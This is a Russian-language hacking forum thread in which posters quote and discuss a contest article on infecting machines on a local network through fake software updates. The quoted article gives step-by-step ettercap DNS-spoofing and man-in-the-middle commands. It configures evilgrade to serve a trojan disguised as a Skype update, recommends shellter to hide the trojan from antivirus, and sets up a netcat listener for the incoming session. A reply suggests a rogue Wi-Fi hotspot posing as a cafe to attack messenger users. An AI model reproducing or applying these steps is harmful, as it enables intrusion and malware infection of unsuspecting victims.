 |
|

09.11.2017, 16:30
|
|
Новичок
Регистрация: 06.03.2017
Сообщений: 0
С нами:
4835747
Репутация:
0
|
|
newbiee сказал(а):
***Скрытый текст***
Срочно оформляй!
|
|
|

09.11.2017, 16:33
|
|
Новичок
Регистрация: 27.06.2017
Сообщений: 0
С нами:
4673078
Репутация:
0
|
|
woolf1514 сказал(а):
***Скрытый текст***
НУ блин я же ещё не вступил, короче я пошёл заряжать, пацаны)))
|
|
|

09.11.2017, 18:18
|
|
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами:
5033900
Репутация:
0
|
|
Ondrik8 сказал(а):
Статья для участия в конкурсе на античат Всем привет, решил выдать еще одну статью на конкурс так-как сегодня узнал что в понедельник я уезжаю в ближнее зарубежье решать вопросы по работе(( Планировал я выпустить эту статью после 15 числа сего месяца но видно не судьба..) По этому выпускаю её экстерном и это будет заключительная моя статья для нашего конкурса от меня.
Речь пойдет о заражении машин в локальной сети через обновление софта пишу ее быстро так-как нужно еще успеть собраться в дорогу за орф. ошибки сильно не пинайте))
Приступлю как Все Мы знаем что все машины в сети постоянно делают запросы " типо не вышло ли что нить нового для меня!?" Это делают ОС-мы, программы от малого до велика платные и бесплатные все обращаются к своему источнику делая этот запрос "обновится"
Вот и расскажу я Вам как сделать fake-update так что бы при очередном запросе софта "домой" он (софт) получил ответ "типа: братка обновляйся! тут для тебя обновочка вышла" Софт в свою очередь будет дурить юзеру мозг, " Хозяин тут на меня обновка вышла нажми "ОК" я сам обновлюсь и будем мы жить с тобою в радости и в счастье"
Помогут нам осуществить эту атаку инструменты : metasploit, ettercap, netcat (котик) и гвоздь нашей программы evilgrade
Эта утилита просто "бомбезная" мало того что у нее есть свои модули для фэйк обновления так она еще дает возможность создавать свои модули для целевой ОС-и (любой) Linux | Windows что конечно же и радует)) подробно об этом инструменте и как создавать модули, Вы можете узнать здесь.
Далее что нам понадобится узнать родной дом программы для фэйк-обновления настроить инструмент ettercap
как узнать куда програмка стучится за обновкой можно двумя способами перехватить ее данные в wireshark-e или просто плотно изучив ее официальный сайт.
Узнали? Отлично, идем редачить файл конфигурации ettercap:
leafpad /etc/ettercap/etter.dns
и запускаем инструмент : ettercap -G
Sniff -->Unified Sniffing
Plugins -->Manage Plugins -->dns_spoof
Hosts --> scan hosts
Чтобы увидеть список машин в сети Hosts -> Hosts list
( по МАС-ам можете не стараться меня пробить)
Теперь поместите себя между маршрутизатором (192.168.1.1), выбрав его как Target 1 и жертву (192.168.1.--), выбрав его как Target 2.
и :
Отложим пока ettercap, настроим evilgrade до конца.
Как генерить и прятать троян от антивирусов здесь на Борде перемусолено, по этому останавливаться на этих моментах я не буду, как по мне так лучше, скачайте оригинал версию программы и смешайте её в shellter-e c Вашим трояном.
"вернемся к нашим баранам" Жванецкий
evilgrade > configure skype
evilgrade(skype) > set agent /root/папка_с_трояном/skype_update.exe start
Запускаем ettercap :
и просим котика что бы он слушал порт <-тот который слушает Метасплойт или Empire то есть на какой порт настроен наш троян!
nc -l -p 4444
и все!)) теперь когда жертва откроет в моем случае skype он (skype) в свою очередь по просит обновится она (терпилка) нажмет "ОК" а мы ....см. ниже))
как то так.))
PS: если выиграю конкурс часть средств уйдет в фонд маленьких замерзших котят, а остальное пойдет в фонд алкоголя для "crazy Rassian Hackers"
а если серьезно то за куплюсь плюшками-радиодеталями и буду Вас радывать новыми статьями)
Удачи..)
Блин , не хочу выглядит гамнокритиком) но где профит самой сессии? Тема эвилгрейда была популярна еще во времена четвертого бактрака (была эта тулза в репозиториях бактрака)
,а именно когда обновления прилетали по http или ftp , без проверки подписи сертификата и без ssl
Имеет конечно место быть данный вектор , но перед тем как его применить нужно быть уверенным что обновления приходят не по ssl и не проверяются подпись и хеш сумы файлов обновления.
По этому я же говорю, где сам профит ,конечный результат??
Последний раз эта утилита у меня работала на обновлении notepad++ в 2013 году. Сейчас не знаю.
Просьба запрофитить на обновоении винды как к твоей статье.)))
[doublepost=1510237121,1510232551][/doublepost]Что бы не быть голословным прошу обратить внимание на дату первого упоминания евилгрейда в гугле:
Вбиваем evilgrade в гугле
и видем первое упоминание в 2011 году в журнале хакер,первые видосы в 2013 году.
|
|
|

16.11.2017, 10:04
|
|
Новичок
Регистрация: 19.03.2017
Сообщений: 0
С нами:
4817306
Репутация:
0
|
|
~~DarkNode~~ сказал(а):
Блин , не хочу выглядит гамнокритиком) но где профит самой сессии? Тема эвилгрейда была популярна еще во времена четвертого бактрака (была эта тулза в репозиториях бактрака)
,а именно когда обновления прилетали по http или ftp , без проверки подписи сертификата и без ssl
Имеет конечно место быть данный вектор , но перед тем как его применить нужно быть уверенным что обновления приходят не по ssl и не проверяются подпись и хеш сумы файлов обновления.
По этому я же говорю, где сам профит ,конечный результат??
Последний раз эта утилита у меня работала на обновлении notepad++ в 2013 году. Сейчас не знаю.
Просьба запрофитить на обновоении винды как к твоей статье.)))
[doublepost=1510237121,1510232551][/doublepost]Что бы не быть голословным прошу обратить внимание на дату первого упоминания евилгрейда в гугле:
Вбиваем evilgrade в гугле
и видем первое упоминание в 2011 году в журнале хакер,первые видосы в 2013 году.
Тоже хотел это написать, но ты меня опередил.
|
|
|

01.01.2018, 18:16
|
|
Новичок
Регистрация: 31.12.2017
Сообщений: 0
С нами:
4403530
Репутация:
0
|
|
Способ рабочий и по сей день . Я имею ввиду саму схему , заражение через вызов обновления . Работает со всем чем пожелаете , начиная от смартфонов и заканчивая ноутбуками на разных ОС . Засветив точку доступа(квадратов так на 100) и замаскировав ее под молодежное кафе или ресторан (в центра любого города) , можно очень сильно налиходееть , используя атаку на приложение которым пользуются почти все , а именно мессенджеры Вайбер или Ваттсап . Единственное различие в том , что evilgrade позволял это сделать любому новичку на готовых модулях , а сейчас это делается на самописных скриптах , но сам способ рабочий . Но это очень дерзкое занятие и требуется соблюдать безопасность
|
|
|

01.01.2018, 19:59
|
|
Новичок
Регистрация: 08.11.2016
Сообщений: 0
С нами:
5005666
Репутация:
0
|
|
Злой Дядька сказал(а):
Способ рабочий и по сей день . Я имею ввиду саму схему , заражение через вызов обновления . Работает со всем чем пожелаете , начиная от смартфонов и заканчивая ноутбуками на разных ОС . Засветив точку доступа(квадратов так на 100) и замаскировав ее под молодежное кафе или ресторан (в центра любого города) , можно очень сильно налиходееть , используя атаку на приложение которым пользуются почти все , а именно мессенджеры Вайбер или Ваттсап . Единственное различие в том , что evilgrade позволял это сделать любому новичку на готовых модулях , а сейчас это делается на самописных скриптах , но сам способ рабочий . Но это очень дерзкое занятие и требуется соблюдать безопасность
вижу.... Спец, ответил!) естть еще способы заражения, но опасно давать людям такие знания!
|
|
|

01.01.2018, 20:11
|
|
Новичок
Регистрация: 31.12.2017
Сообщений: 0
С нами:
4403530
Репутация:
0
|
|
Ondrik8 сказал(а):
вижу.... Спец, ответил!) естть еще способы заражения, но опасно давать людям такие знания!
Вы совершенно правы , учитывая то что в Снг (и не только) могут упаковать лишь за комментарий , то что уж и говорить о наших методах) К тому же кощунство выкладывать новичкам уязвимости , над которыми работаешь порой продолжительное время . Хотя мне жаль начинающих ребят , слишком большой порог вхождения сейчас и они бывают разочаровываются видя лишь методики в открытом доступе , которые блокируются всем чем можно уже на стадии выходи эксплойта .
|
|
|

18.01.2018, 02:43
|
|
Новичок
Регистрация: 30.06.2017
Сообщений: 0
С нами:
4668624
Репутация:
0
|
|
Огненная статья! Как раз в тему зашла, надеюсь что в поле она отработает себя на 100%. Спасибо за труды!
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|